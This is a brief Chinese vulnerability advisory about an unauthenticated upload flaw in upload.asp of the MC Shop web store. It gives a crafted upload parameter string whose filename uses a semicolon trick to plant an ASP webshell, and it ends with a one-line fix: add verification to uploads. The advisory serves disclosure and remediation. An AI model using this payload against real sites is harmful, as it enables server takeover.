漏洞描述:MC Shop网络商城后台上传未进行身份验证,导致构造上传畸型文件获取网站shell。

漏洞文件:upload.asp 存在上传漏洞 文件地址网站后台
构造上传:?fuptype=adv&fupname=chouxiaozi.asp;hacker.&frmname=hf17pic

修复方案:

上传进行验证